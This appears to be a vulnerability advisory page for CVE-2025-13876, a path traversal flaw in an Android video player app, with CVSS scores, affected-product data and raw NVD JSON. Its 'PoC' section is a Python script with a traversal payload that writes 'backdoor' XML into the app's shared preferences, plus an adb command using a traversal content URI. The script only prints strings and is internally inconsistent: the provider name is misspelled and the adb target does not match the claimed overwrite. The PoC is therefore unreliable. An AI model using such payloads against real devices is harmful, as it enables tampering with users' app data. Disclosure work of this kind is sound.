Security Vulnerability Report
CVE-2025-13876 CVSS 5.3 MEDIUM

Published: 2025-12-02 15:15:50
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in Rareprob HD Video Player All Formats App 12.1.372 on Android. Impacted is an unknown function of the component com.rocks.music.videoplayer. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:rareprob:hd_video_player_all_formats:12.1.372:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:*:*:*:*:*:*:*:* - NOT VULNERABLE
Rareprob HD Video Player All Formats App < 12.1.372

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2025-13876 PoC - Rareprob HD Video Player Path Traversal
Arbitrary File Overwrite Vulnerability
'''


def create_malicious_video():
    """Create a malicious video file with path traversal payload"""
    # Path traversal sequence to reach external directories
    traversal_path = "../../../../data/data/com.rocks.music.videoplayer/shared_prefs/"
    target_file = "settings.xml"

    # Malicious content to overwrite
    malicious_content = '''<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="backdoor">enabled</string>
</resources>
'''

    # Construct the full malicious path
    malicious_path = traversal_path + target_file

    print(f"[*] Target Path: {malicious_path}")
    print(f"[*] Content Length: {len(malicious_content)} bytes")

    return malicious_path, malicious_content


def exploit_via_content_provider():
    """
    Exploit path traversal via exported ContentProvider
    This is a conceptual PoC - actual exploitation requires proper Android environment setup
    """
    print("=" * 60)
    print("CVE-2025-13876 Path Traversal Exploitation PoC")
    print("=" * 60)

    # Step 1: Identify vulnerable component
    print("\n[Step 1] Identifying vulnerable component...")
    print("Component: com.rocks.music.videoplayer")

    # Step 2: Generate malicious path
    print("\n[Step 2] Generating malicious file path...")
    path, content = create_malicious_video()

    # Step 3: Demonstrate path traversal
    print("\n[Step 3] Path traversal payload:")
    print(f"  Input: {path}")
    print("  Resolved: /data/data/com.rocks.music.videoplayer/shared_prefs/settings.xml")

    # Step 4: File overwrite demonstration (second line of the payload is the <resources> root)
    print("\n[Step 4] File overwrite scenario:")
    print(f"  Target: {content.splitlines()[1]}")
    print("  Result: Arbitrary file overwrite in app sandbox")

    # Step 5: Impact assessment
    print("\n[Step 5] Potential impact:")
    impacts = [
        "1. Overwrite application configuration files",
        "2. Modify shared preferences for privilege escalation",
        "3. Inject malicious code into application data",
        "4. Corrupt application storage leading to DoS",
    ]
    for impact in impacts:
        print(f"  {impact}")

    print("\n[*] PoC demonstration complete")
    print("[*] Note: Actual exploitation requires Android device/emulator")


def generate_adb_exploit_command():
    """Generate ADB command for exploitation"""
    print("\n[ADB Exploitation Command]")
    print("=" * 60)
    cmd = '''# ADB command to trigger path traversal
adb shell am start -a android.intent.action.VIEW \
    -d "content://com.rocks.music.videopleler.provider/../../../../etc/hosts" \
    -t "video/*"'''
    print(cmd)


if __name__ == "__main__":
    exploit_via_content_provider()
    generate_adb_exploit_command()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13876", "sourceIdentifier": "[email protected]", "published": "2025-12-02T15:15:50.350", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Rareprob HD Video Player All Formats App 12.1.372 on Android. Impacted is an unknown function of the component com.rocks.music.videoplayer. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:rareprob:hd_video_player_all_formats:12.1.372:*:*:*:*:*:*:*", "matchCriteriaId": "86230AFC-7F6F-4371-AF3C-786695AAFBC1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*", "matchCriteriaId": "8255F035-04C8-4158-B301-82101711939C"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/blob/main/HD%20Video%20Player%20All%20Formats/HD%20Video%20Player%20All%20Formats%20APP%20Arbitrary%20File%20Overwrite%20Vulnerability.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334032", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334032", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.692169", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}